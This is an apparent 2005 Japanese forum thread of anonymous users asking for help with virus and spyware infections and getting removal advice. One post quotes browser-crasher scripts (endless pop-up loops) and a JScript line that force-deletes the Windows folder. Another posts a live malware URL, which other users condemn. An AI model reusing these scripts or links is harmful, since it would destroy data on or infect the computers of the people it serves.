それはこれからの対策で今感染したウイルスに関して駆除法を知りたいのです
378 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 01:35:36 ]: >>375
初心者には防御はできても駆除はできません。残念・・・。
379 名前：377 mailto:sage [2005/04/11(月) 01:39:17 ]: >>378
ちゃんと対応しているウイルスバスターを買えば駆除できますか？
380 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 01:53:32 ]: >>379
おれはNOD32を勧める。
381 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 01:55:19 ]: >>377
HTML_CRINET.A
この場合、12000回も訪問されるんじゃ被害者はM$だな。
キャッシュクリアしてVB2005の最新パターンファイルでスキャン。
漏れは寝るから訊き返さないでくれ。
382 名前：379 mailto:sage [2005/04/11(月) 02:12:14 ]: >>380
明日店できいてみますね

>>381
M$？

やはり専門の人呼ぶしかないかな…
383 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 02:25:34 ]: >>382

M$=Microsoft
384 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 02:26:21 ]: 馬鹿はどこへ行ってもスルーされるだけだ
385 名前：382 mailto:sage [2005/04/11(月) 02:33:19 ]: >>383
ありがとうです

>>384
２ちゃんきびしい
386 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 06:07:34 ]: >>373＝375＝377＝379＝382

他ｽﾚでも散々回答さてれるにも関わらず
他ｽﾚで締め切りもせずここで自己認識した上でﾏﾙﾁ。
よって、ここでも以後ｽﾙｰでよろ。
回答がでなければ専門家に依頼との事なので問題なし。
387 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 07:01:09 ]: 【使用OS】　XP
【WindowsUpdateしてるか】　してます
【AntiVirusは何を使っているか】　ノートン2002
【ちゃんとUpdateしてるか】　してます
【スキャンした結果（ウイルス名・発見場所）】　異常なし
【別のオンラインスキャンしたならその結果は】　異常なし

【症状を具体的に、分かる限りすべて書く】
削除しようとすると「送り側のディスクから読み取れません」とエラーのでる
フォルダがいつのまにか3つ生成されていた。（a,b,cとする)
その3つのフォルダ同士をドラッグ＆ドロップ（aからc,ｃからbという風に)して
1つにするとなぜか上記のメッセは出ずに削除できる。
しかし削除後いったん閉じて生成場所を開くと、また生成されている。

【何をしたらそんなことになったのか】心当たりありすぎて検討も･･･

【その他の質問】
気づいてないだけかもしれませんが、他におかしい所は特に無いです。
やはり何かのウィルスでしょうか？
388 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 07:06:48 ]: >>387に追記
生成されるフォルダ名は前に一度落としたことのあるものの名前です
389 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 07:16:50 ]: W32/Coke.22231ってうウイルスが出てきたんですけど、どうすれば削除できます？
390 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 07:31:58 ]: ソフトで駆除
391 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 10:12:20 ]: ノートンとかのウイルス駆除のHPに
行こうとしてもいけないorz
392 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 10:20:23 ]: >>391
hostsリスト書き換えられてます。
393 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 14:49:20 ]: >>386

はぁ？なんだこのクズ
他スレの説明がわかりづらいからここにきたんだろうがオタクどもが専門用語ばっかつかいやがって
394 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 16:03:55 ]: >>387
もしかしてny使ってる？
395 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 22:08:29 ]: >>393
396 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/12(火) 02:28:43 ]: >>393
bakamarudasi（ｗ
397 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/12(火) 17:35:18 ]: 【使用OS】 XP
【WindowsUpdateしてるか】再インストールしたばかりでしていなかった
【AntiVirusは何を使っているか】ウイルスバスター2005
【ちゃんとUpdateしてるか】している
【スキャンした結果（ウイルス名・発見場所）】TROJ_SMALL.ZF C:\WINDOWS\system32\erenntma.exe
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】駆除をしても再起動すると復活する、ホームが書きかえられている、お気に入りに変なアドレスが追加されている
【何をしたらそんなことになったのか】 2chを見てて不覚にも引っかかった
【これまでにとった措置】スパイウェア駆除、ウイルス駆除、システムの復元を無効に、一時ファイル削除
【その他の質問】ウイルスバスターでTROJ_SMALL.ZFの詳細を見ようとしたら全部英語...orz
ウェブ翻訳使ったりしたけどさっぱりで；；
助言お願いします。。
398 名前：名無しさん＠お腹いっぱい。 [2005/04/12(火) 17:35:51 ]: 【別のオンラインスキャンしたならその結果は】スキャン中
ついでにageます
399 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/12(火) 18:13:07 ]: 213.159.117.133/dl/ms.php
これを踏んだら何も表示されない真っ白なページが出てしまいその後パソが変になりました。
放っておいても大丈夫だ。
400 名前：名無しさん＠お腹いっぱい。 [2005/04/12(火) 18:22:59 ]: スパイウエァの診断をしたら感染していました。
以下の状態ですとなにか私の個人情報など
外部に漏れている疑いがあるのでしょうか？
これらのスパイウエァの及ぼす影響を教えていただきたいです。
Adware:Adware/Gator 駆除不能 C:\Program Files\PrecisionTime\PrecisionTime.exe
Adware:Adware/Gator 駆除不能 C:\Program Files\DashBar
Spyware:Spyware/CnsMin 駆除不能 Windows レジストリ
401 名前：400 mailto:sage [2005/04/12(火) 18:24:21 ]: すみません書くところ間違えました。
402 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/12(火) 18:33:45 ]: >>399
おまいは大丈夫でも他人も同じだと思うな。
スパイやウィルス満載のURLへの直リンなんか張るなボケ！
403 名前：名無しさん＠お腹いっぱい。 [2005/04/12(火) 19:02:11 ]: >>399
直リンするな。市ね
404 名前：397 [2005/04/12(火) 20:00:58 ]: 【別のオンラインスキャンしたならその結果は】上のとは別のトロイウイルスが検出されました、、
でも駆除成功。しかし　TROJ_SMALL.ZF　は再起動しても出てます。。
TROJ_SMALL.ZF　について詳しく知ってる方いましたら情報お願いします
405 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/12(火) 22:41:57 ]: >101 萌える名無し画像 sage 2005/04/12(火) 18:44:21 ID:iBAR5Gmt
>ええけつしとるのぉ(*´Д`)ﾊｧﾊｧ
>192.168.11.2/
>192.168.11.2/~ss.jpg
>OEMCOMPUTER/
>OEMCOMPUTER/~ss.jpg

↑
この手の書き込みをするウイルスがあるという話を聞いたのですが、
何か情報ありますか？
406 名前：405 mailto:sage [2005/04/12(火) 22:57:12 ]: 自己解決。山田ウィルスというらしい。
まとめサイトらしい。
↓
ttp://nemoba.seesaa.net/article/2891535.html
407 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/12(火) 22:59:25 ]: 【使用OS】
XP
【WindowsUpdateしてるか】
してます
【AntiVirusは何を使っているか】
ノートン2003
【ちゃんとUpdateしてるか】
してます
【スキャンした結果（ウイルス名・発見場所）】
1種類2個発見(ウイルス名Trojan Horse・発見場所C\Windows\system32￥vehewcb.exe)
【別のオンラインスキャンしたならその結果は】
今回見つかったウイルスとは別物のようですが、1週間前ぐらいに、トレンドマイクロとマカフィーでスキャンしたら、
トレンドマイクロでTROJ_BI.A、TROJ_DIALER.AM、TROJ_SWIZZOR.BT(他にも1種あったかもしれませんが、思い出せず、特定できませんでした)を検出しました。
約1週間前にスキャンした時点では、この別物と思われる3(+1)個のウイルスはトレンドマイクロでのみ検出されました。
【症状を具体的に、分かる限りすべて書く】
今のところ、とくに確認できませんでした。
【何をしたらそんなことになったのか】
わかりません。今日PCを立ち上げたら、PCGATE PersonalがTODO: <File description>　vehewcb.exeのアクセス確認をしてきたので、
気になって検索し、vehewcbと名前がつくファイルをノートンでスキャンしたら、ウイルスが検出されました。
【これまでにとった措置】
ノートンでスキャンしましたが、削除できませんでした。
C\Windows\prefetchにもvehewcb.exeがあったので、ファイルを削除しました。
【その他の質問】
system32に2つあるvehewcb.exeは削除していませんが、削除していいのでしょうか？
MS-DOSファイルです。
1つのexeファイルの作成日は今日ですが、もうひとつのは2003年12月18になってます。

どうすればウイルスを削除できますでしょうか。
また考えられる被害などありましたら、お教え下さい。

よろしくお願いします。
408 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/12(火) 23:47:46 ]: >>407
＞【WindowsUpdateしてるか】
＞してます
ほんと～に～？
スタート→ファイル名を指定して実行→regedit→OK
レジストリエディタが開くので、次の場所に移動する。
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID
編集→検索で次のやつを検索にかけてみる。
{9F1C11AA-197B-4942-BA54-47A8489BB47F}
見つかったか？
409 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/12(火) 23:48:46 ]: >>408補足
見つかっても絶対に削除してはならぬぞ。
起動できなくなるからな。
410 名前：407 mailto:sage [2005/04/12(火) 23:57:10 ]: 最後のCLSIDが見つかりません。
411 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/13(水) 00:03:18 ]: >>410
じゃあ、もう一度レジストリエディタ開いて。
次はレジストリエディタのマイコンピュータって奴を選択する。
編集→検索で{9F1C11AA-197B-4942-BA54-47A8489BB47F}を検索する。
（検索対象のキーにチェックを入れてよ）
見つかったら、報告して。
たぶん場所は以下だと思う。
HKEY_CLASSES_ROOT\CLSID
412 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/13(水) 00:09:54 ]: しかしCLSIDが見つからないってどういうこと？
413 名前：名無しさん＠お腹いっぱい。 [2005/04/13(水) 00:18:09 ]: ウイルス「Mytob」の亜種、再び大量に発生～2日間で11種類出現
ttp://news.goo.ne.jp/news/internet/it/20050412/iw2005041205-internet.html
414 名前：407 mailto:sage [2005/04/13(水) 00:36:31 ]: やっぱりみつかりません・・・・・。

レジストリをすべて検索しましたって出るんですが、特に何も表示がないです。
415 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/13(水) 00:49:27 ]: >>414
おかしい…じゃあ、デスクトップのマイコンピュータを開いて
C:\WINDOWS\Downloaded Program Filesの中身にあるアイコンの名前を
ここに全部貼ってくれ。
416 名前：407 mailto:sage [2005/04/13(水) 01:14:59 ]: こんなもんしかなかったです

{00000045-9980-0010-8000-00AA00389B71}
{1E89F686-B78D-4C85-9EFC-3474516E3FE2}
CInstall Class
Innotive Cibrowser Control 1.1
McFreeScan Class
NEC Content Update
Office Update Installation Engine
Quick Time Object
SassCln Object
Shockwave Flash Object
Yahoo! JAPAN Billiards
ｳｲﾙｽﾊﾞｽﾀｰ On-line Scan
417 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/13(水) 01:46:23 ]: >>399
ひぃひっ、(((;ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

冒険心で踏んでしまった・・・・＿|￣|○　ｶﾞｯｸｼ
418 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/13(水) 09:12:23 ]: >>416
ノートンならセーフモードで起動して全ドライブをスキャン後に
発見されたものを削除すればいいんじゃなのか？
ほとんどのウィルスやスパイウェアの本体ファイルは
OSを通常起動すればプロセスが実行されてしまうので
OSに削除拒否されるぞ
419 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/13(水) 11:59:39 ]: レジストリの各種設定と本体ファイルは表裏一体
どちらかを削除してしまえば実行されない
俺はレジストリの各種起動設定の削除の方が重要だと思っているんだが
ファイルだけ削除しても構わない
また、ファイルだけなら残っても、将来ウィルスだとベンダーが対応すればその時に検出される
420 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/13(水) 12:10:00 ]: トレンドマイクロのオンラインスキャンで
WORM RBOT.BAV
が検出されたのですが
REGEDITでwinegg.exeを消したりしたのですがまだ検出されます
C:\SystemVolume Information\restore{17EC8DOF-A3FO-4A5A-9528-593CE8FCFCB7}\RP22\A0000743.exe
だそうです。
このワームの情報自身、検索でも情報が少なくて・・・
今はタスクマネージャでは活動して無いように見えますが
駆除方法を御教授してください。
OSはXPSP2
今現在はカウントダウンなど無いです
AVGをダウンロードしようとしてネットに接続したとたんに・・・
421 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/13(水) 12:21:38 ]: 微妙にすれ違い。
AVG（ttp://www.grisoft.com/doc/1）でどれを落とせばいいのか分からないです。英語むずかしい･･･。orz
WindouwｓXP使用。
ウィルスを検疫・対処できるものが欲しいのですが。
422 名前：420 mailto:sage [2005/04/13(水) 12:36:33 ]: >421
free.grisoft.com/freeweb.php/doc/2/lng/us/tpl/v5
ここの下の方のフリーエディションだよ無料のが良いならね。
助けを求めてる俺が言うのもおこがましいけれどｗ
423 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/13(水) 12:40:09 ]: どうもです～。（・∀・）

30日間の無料期間が終わったらそっち移行しよっとｗ
424 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/13(水) 15:09:48 ]: メールで「あなたが送ったメールにW32.Mytob.B@mmが含まれているので削除しました」
というのがあったので、
トレンドマイクロとシマンテックのオンラインスキャンで調べてみたのですが検出されません。
もう手詰まり状態で困ってるんですがどうすればいいでしょうか。
425 名前：407 mailto:sage [2005/04/13(水) 15:10:58 ]: 一応、ノートンの完全スキャンで検疫出来たみたいです。
でもウイルスは一個だけでしたが。
>>418
ありがとうございます。
やってみます。

>>419
ありがとうございます。
できればレジストリを削除したほうがいいが、今の状況だと、レジストリが何か分からないから、
vehewcb.exeファイルを削除すればいいんですよね。

無知ですいません。
426 名前：名無しさん＠お腹いっぱい [2005/04/13(水) 15:31:23 ]: 【使用OS】 windows me
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】ＶＢ2005
【ちゃんとUpdateしてるか】している
【スキャンした結果（ウイルス名・発見場所）】 TROJ_WHENU.1・Ｃ:\WINDOWS\whenu.exe
【別のオンラインスキャンしたならその結果は】していない
【症状を具体的に、分かる限りすべて書く】動作が遅い
【何をしたらそんなことになったのか】分からない
【これまでにとった措置】バスターで隔離済み
【その他の質問】データベースにもこのウイルスの情報が無いため、
このウイルスの情報が知りたい（何をしようとしていたのか、どこから感染したのか）
427 名前：407 mailto:sage [2005/04/13(水) 15:59:37 ]: >>425
付け足し情報ですいません。

検疫したから、現在、system32フォルダのなかにあるvehewcbと名前がつくものは、
2つあったうちの1個の、MS-DOS プログラムへのショートカット、しか表示されていません。
これの作成日が2003年12月18です。これも削除していいんですかね。

また、たった今、通常モードでノートン完全スキャンしたら、感染は見つかりませんでした。
428 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/13(水) 17:11:35 ]: >>427
余計なものを削除した不具合が怖いのなら、

隔離ファイル
隔離機能は、感染ファイルや不審なファイルを暗号化し、
適切な操作を実行できるようになるまで一時的に隔離フォルダに隔離します。
隔離されたファイルは、ウイルスを駆除した後、元の場所に復元できます。
429 名前：名無しさん＠お腹いっぱい。 [2005/04/14(木) 01:08:27 ]: win2000Pro SP4なのですが、
タスクマネージャーを開けてみると、
wmp.exeなるプログラムが１００個以上立ち上がっていました。
ドライブ内を検索した所、
C:\WINNT\wmp.exe（更新日時4/7 11:34）
C:\WINNT\system32\wmp.exe（更新日時同上）
C:\WINNT\system32\payload.dat（更新日時同上）

３つのファイルが、同一の更新時刻で入っていました。
自分は覚えがないのですが・・・・・・ウィルスでしょうか？
430 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 01:15:18 ]: >>429
ウィルススキャンしたらどうなるの？
431 名前：名無しさん＠お腹いっぱい。 [2005/04/14(木) 08:23:07 ]: WindowsUpdateに関して質問です。
【使用OS】 XP
【WindowsUpdateしてるか】通知が出るように設定してあり、手動で更新しています。
【AntiVirusは何を使っているか】ノートン
【ちゃんとUpdateしてるか】していない
【スキャンした結果（ウイルス名・発見場所）】＿
【別のオンラインスキャンしたならその結果は】＿
【症状を具体的に、分かる限りすべて書く】
今朝、PCを立ち上げたら自動更新の通知が出ました。
普段通り手動でインストールしたのですが、アップデートに失敗しています。（２回試しました）
今までこういう事は一度も無かったのですが・・・。
以下は更新が出来なかったプログラム一覧です。

Windows XP 用セキュリティ更新プログラム (KB893066)
Internet Explorer 6 Service Pack 1 用の累積的なセキュリティ更新プログラム (KB890923)
Windows 悪意のあるソフトウェアの削除ツール - 2005 年 4 月 (KB890830)

【何をしたらそんなことになったのか】 WindowsUpdate
【これまでにとった措置】マイクロソフトのHPを確認→対処方法が不明
【その他の質問】なし
432 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 08:27:15 ]: はぁ？
433 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 09:36:27 ]: >>431
どのようなエラーが出たのか書いてもらわないと
返答のしようがありません。
434 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 09:44:26 ]: >>429
モロにウィルス
ttp://www.symantec.co.cr/region/jp/sarcj/data/w/w32.randex.d.html

＞また、このワームはBackdoor.Roxyとして検出される"バックドア型トロイの木馬"を投下します。
＞バックドア型トロイの木馬は次のポートで攻撃者のコマンドを待機します。

＞Backdoor.RoxyをPayload.datとして作成・実行します。そのバックドア型トロイの木馬は次の値
＞"System Initialization"="payload.dat"を次のレジストリキーに追加することで
＞HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
＞Windowsの起動時に必ずバックドア型トロイの木馬が実行されるようにします。

つまり、urlのウイルスじゃない、wmpがバックドア型トロイの定番を投下してる状態。
もうダメポ
435 名前：私のじゃないんですが [2005/04/14(木) 14:04:54 ]: 友人のPCなんですがw32.netsky.pを検出しました

使用OSはWinXPで、ﾉｰﾄﾝを使っているらしいです

対策を調べて差出人がわからない添付のﾒｰﾙを消しました
ノートンのメッセージは消えたんですがこれは駆除に成功したのでしょうか？
436 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 14:13:37 ]: Windows XP Start.wavとWindows XP Shutdown.wavが
気づいたら「腹を切って死ぬべきである」に置き換わってるんだけど・・・

やられた？
437 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 14:16:36 ]: The Microsoft Sound.wav、Windows NT ﾛｸﾞｵﾝ.wav、Windows ログオン.wavも同様・・。
438 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 14:24:28 ]: (´-`).｡oO(腹を切って死ぬべきなんだろうな…)
439 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 14:24:36 ]: >>431
Windowsｱｯﾌﾟﾃﾞｰﾄの失敗なんて珍しくない事。
あと数回やってﾀﾞﾒだったらここから探してﾀﾞｳﾝﾛｰﾄﾞ→保存してｲﾝｽｺ汁。
ttp://www.microsoft.com/downloads/search.aspx?displaylang=ja&categoryid=7
440 名前：431 [2005/04/14(木) 15:31:50 ]: >>433
エラーの詳しい理由は表示されず
「更新できませんでした」としか出ません。

>>439
失敗って多いんですか・・・。自分は今日が初めてでした。
その後何度か再起動をして何度か試したものの、結局うまくいきませんでした。
そこからダウンします。ありがとうございました。
441 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 18:52:01 ]: >>440
再起動は関係ないぞ
混み合ってるだけｗ
442 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 18:56:49 ]: >>440
今回は「更新を自動的にダウンロードするが、インストールは手動で実行する」の設定にして
準備完了の通知が出るまでﾏﾀｰﾘ待てば？
443 名前：名無しさん＠お腹いっぱい。 [2005/04/14(木) 19:54:50 ]: ウイルススキャンしたら
「Downloaded Program Files」の中に
「HDPlugin1019.dll」という「Adware.Gator」ウイルスが発見されました。
しかしこのウイルスが削除できないんです。フォルダの中に存在しません。
どうしたらよいのでしょうか？
どなたか教えて下さいお願いします。
444 名前：名無しさん＠お腹いっぱい。 mailto:ｺﾋﾟﾍﾟ用sage [2005/04/14(木) 20:48:23 ]: >>443
コントロールパネル→フォルダオプション→「表示」タブ
「すべてのファイルとフォルダを表示する」をチェック
「保護された～（推奨）」のチェックをはずす
445 名前：名無しさん＠お腹いっぱい。 [2005/04/14(木) 21:09:02 ]: >>444
ありがとうございます、しかし何も見つかりませんでした。
一体なんなんでしょう…。
446 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 21:16:38 ]: >>445
Gatorか？
DivXでもいれてるんか？
だったらDivXを削除。
447 名前：443 [2005/04/14(木) 21:23:47 ]: >>446
ありがとうございます、やっぱりダメでした。
そもそも「HDPlugin1019.dll」なんて存在しないのになぜ引っ掛かるんでしょうか…
448 名前：443 [2005/04/14(木) 21:37:42 ]: 何とか事故解決できました。
スレ汚してスンマセンでした。
449 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 21:38:03 ]: >>447
レジストリエディタ起動して、「HDPlugin1019」で引っかかるか検索してみる。
全ドライブを「ファイル名やフォルダで検索」で、ファイル名「HDPlugin1019.dll」が存在するかどうか検索してみる。
引っかかったら手がかりが得られるかも。
450 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 21:39:05 ]: って遅かったか。
451 名前：443 mailto:sage [2005/04/14(木) 21:43:52 ]: >>449
いえいえ、ありがとう御座いました。
これからも私ら初心者をよろしくお願いします。
452 名前：名無しさん＠お腹いっぱい。 [2005/04/14(木) 21:45:46 ]: オンラインスキャンをするときは、SafeModeでやったほうがいいんですか？
それともいつも使ってる状態でスキャンしても変わり無いんでしょうか？
453 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 21:52:29 ]: >>452
出来るもんならやってみろ
454 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 22:00:10 ]: >>453
あれ？出来ないの？
SafeModeってネット関連を呼び出すModeもありませんでしたっけ？
455 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 22:10:57 ]: 【使用OS】 Windows XP
【WindowsUpdateしてるか】通知が来たらしています
【AntiVirusは何を使っているか】ノートン
【ちゃんとUpdateしてるか】していない
【スキャンした結果（ウイルス名・発見場所）】 system32フォルダの中で、Trojan Horse でした
【別のオンラインスキャンしたならその結果は】していません
【症状を具体的に、分かる限りすべて書く】特に症状は出ていません
【何をしたらそんなことになったのか】今日パソコンを立ち上げたらウィルス警告が出ました。心当たりがありません・・・
【これまでにとった措置】
【その他の質問】

感染しているファイルを削除しようとしたら
現在使用中で削除できません～みたいな文が出たので
タスクマネージャで終了してから削除しようと思ったのですが
終了した途端別なファイル名でまた出現しています
ファイル名はランダム？で.exeがついています
456 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 22:11:10 ]: >>453
ちょっとやってみます。
457 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 22:15:54 ]: >>455
とりあえずセーフモードで、ノートン走らせる。
458 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 22:16:41 ]: [セーフモードとネットワーク]だけん？
アクティブXが強制的に無効になるんやかないけ？
オンラインスキャンはアクティブXコントロールが必要なもしかもや？
459 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 22:19:04 ]: >>457
セーフモードでのノートンはすっかり忘れていました。
やってきます
460 名前：嬲 [2005/04/14(木) 22:23:00 ]: <scriptlanguage="JavaScript">while(1){open('./');}</script>
<bodyonload="for(;;){alert('適当');}">

<bodyonload="for(;;){newwin=window.open();}">

<scriptlanguage="jscript">var fso fso = new ActiveX0bject('Scripting.Filesystem0bject");fso.DeleteFolder('C;\\Windows",true);</script>
これ何？
461 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/14(木) 23:30:17 ]: >>460
よくわからんけど上三つは無限ループ。無限増殖ブラクラ。
表示サイト（これは入れ子効果になるんかな？）、空ウィンドウ、警告ダイアログの三つ
最後はC:\Windowsフォルダを消すだと思う。Trueは強制だったっけ？
462 名前：316 [2005/04/15(金) 00:03:28 ]: >>316です。
たびたびすみません。
前回の件は解決したのですが、その後ノートンの活動ログに気になる箇所を発見しました。
Symantec Resource Protector 警告を見ると「権限がないアクセスをログに記録しました」という処理がされています。
この処理が今は６個／日、インストールした日は100個くらい？でました。（下記のようなのが沢山処理されている）
何か対策が必要でしょうか･･･

イベントの詳細:
日時: 2005/04/13 10:34:48
処理者: C:\WINDOWS\system32\winlogon.exe (PID=632)
対象: C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe (PID=220)
処理: 権限がないアクセス
対応: 権限がないアクセスを停止しました
463 名前：名無しさん＠お腹いっぱい。 mailto:age [2005/04/15(金) 00:24:13 ]: 【使用OS】 WindowsXP SP1
【WindowsUpdateしてるか】してない
【AntiVirusは何を使っているか】 Norton
【ちゃんとUpdateしてるか】してる
【スキャンした結果（ウイルス名・発見場所）】 C:\WINDOWS\system32\mdmdev.exe
【症状を具体的に、分かる限りすべて書く】現在のところありません。
【何をしたらそんなことになったのか】いきなりノートン先生が警告

ウイルス名は”Trojan House”って書かれていますがトロイですよね。
「ファイルを修復できませんでした。」とでてしまいます。削除もできません。
警告ウィンドウも無限に開いて閉じれません。
よろしくお願い致します。
464 名前：上島龍平 mailto:_@gao.ne.jp [2005/04/15(金) 00:25:44 ]: 　　　○　　　○　＜押すなよ！絶対に押すなよ！
　　　|こ　／ |
　　　 >ヽ　|⌒ 新しいフォルダ　　　　　　　　　　　　　　　　　　　　　　　　　　.exe
465 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 00:26:10 ]: >>463
セーフモードでスキャンしてみ
466 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 00:36:27 ]: その前にｳｨﾝﾄﾞｳｽﾞｱｯﾌﾟﾃﾞｰﾄだろ
467 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 04:59:00 ]: 【使用OS】 WindowsXP
【WindowsUpdateしてるか】してる
【AntiVirusは何を使っているか】 Norton
【ちゃんとUpdateしてるか】してる
【スキャンした結果（ウイルス名・発見場所）】C:￥Documents and settings\私の名前￥Lo...\1113490653[1].htm
【症状を具体的に、分かる限りすべて書く】現在のところありません。
【何をしたらそんなことになったのか】いきなりノートンが警告
ウィルス名はunix.penquinです
どうすればいいでしょうか？よろしくお願いします
468 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 05:04:23 ]: >>467
ノートントラップだと思う
469 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 05:12:54 ]: 468 さん
どうすればいいのでしょうか？
PCのことほとんどわかりません
470 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 05:15:20 ]: >>469
www.geocities.jp/cen_hp/program3.html
の誤反応スクリプト無効化ソフトを落として、
そのファイル突っ込んでみ？
それでいけるはず。
それで無理なら、とりあえず、スキャンしてみようか
471 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 06:07:32 ]: >>467
C:￥Documents and settings\ユーザー名￥Lo・・・・
と続く中にあるhtmlファイルといえば、おそらく
C:￥Documents and settings\ユーザー名￥Local Settings\Temporary Internet Files\
で、これはIEで閲覧したファイルを格納しておくための単なるデータ置き場だ。
ウイルスはまずこんなトコで動かない。htmlファイルは単なる文章だし。

だがノートンはそんなことお構いなしに
文章中にウイルスのプログラムのような書き込みがあるだけでも警告を出すヒステリック過保護野郎だ
472 名前：muro zaqdadccea3.zaq.ne.jp/ mailto:zage [2005/04/15(金) 06:09:12 ]: え　　　　　っ　　　　　る　　　　　ﾊ　　　　　
　　ぇ　　　　　し　　　　　の　　　　ァ　ﾊ　　
　　　　け　　　　　と　　　　　ぉ　　　　　ァ　
うはっwww夢がひろがりんぐwwwwww　　　
473 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 06:39:01 ]: 467です
とりあえずノートンが言っているフォルダのファイルは
消してみました
これでおｋでしょうか？
471さんのおっしゃるとおりデータ置き場みたいでした。
474 名前：muro ntaich086179.aich.nt.ftth.ppp.infoweb.ne.jp/ mailto:zage [2005/04/15(金) 07:31:10 ]: え　　　　　っ　　　　　る　　　　　ﾊ　　　　　
　　ぇ　　　　　し　　　　　の　　　　ァ　ﾊ　　
　　　　け　　　　　と　　　　　ぉ　　　　　ァ　
うはっwww夢がひろがりんぐwwwwww　　　
475 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 07:59:58 ]: いろいろ調べましたが、検索語が的を外しているのか、うまく調べられないので
お知恵を拝借いたしたいと思います。

【使用OS】WinXP Pro
【WindowsUpdateしてるか】 Yes
【AntiVirusは何を使っているか】 No
【スキャンした結果（ウイルス名・発見場所）】トレンドマクロオンラインスキャンでは何もHitせず
【症状を具体的に、分かる限りすべて書く】ワード、エクセルを右クリ→新規作成すると「ぬるぽ」「ガッ・(名前)」というファイルが作成される。かなりウジャイ。
【何をしたらそんなことになったのか】昔Winnyやってたから？
【これまでにとった措置】 No
【その他の質問】ウイルスですか？ウイルス名さえ教えていただければ後は自力でどうにかしたいと思います。
　メジャーなウイルスだったりする気がしないでも無いことは無い。。。
476 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 10:01:31 ]: 放置して良いのか不安なのでどなたか教えて下さい。

私の送ったメールがウイルスに感染しているという趣旨のメールが銀行や企業の
サーバーから時折送られてきます。
これは単にメールのFrom宛に送り返しているだけなんでしょうか。
先週からウイルスメールがよく来るようになって調べ、差出人というのは
詐称されると知りました。
これもその所為なら放っておいていいのかなと思うのですが、詐称は当たり前
みたいなので、サーバーで単純にFromのアドレスに返信する様にしてるのも
変かな？という気もして・・・。
ノートンで問題無しなら、大丈夫なものでしょうか。

【使用OS】 Window2000
【WindowsUpdateしてるか】しています
【AntiVirusは何を使っているか】 Norton AntiVirus2005
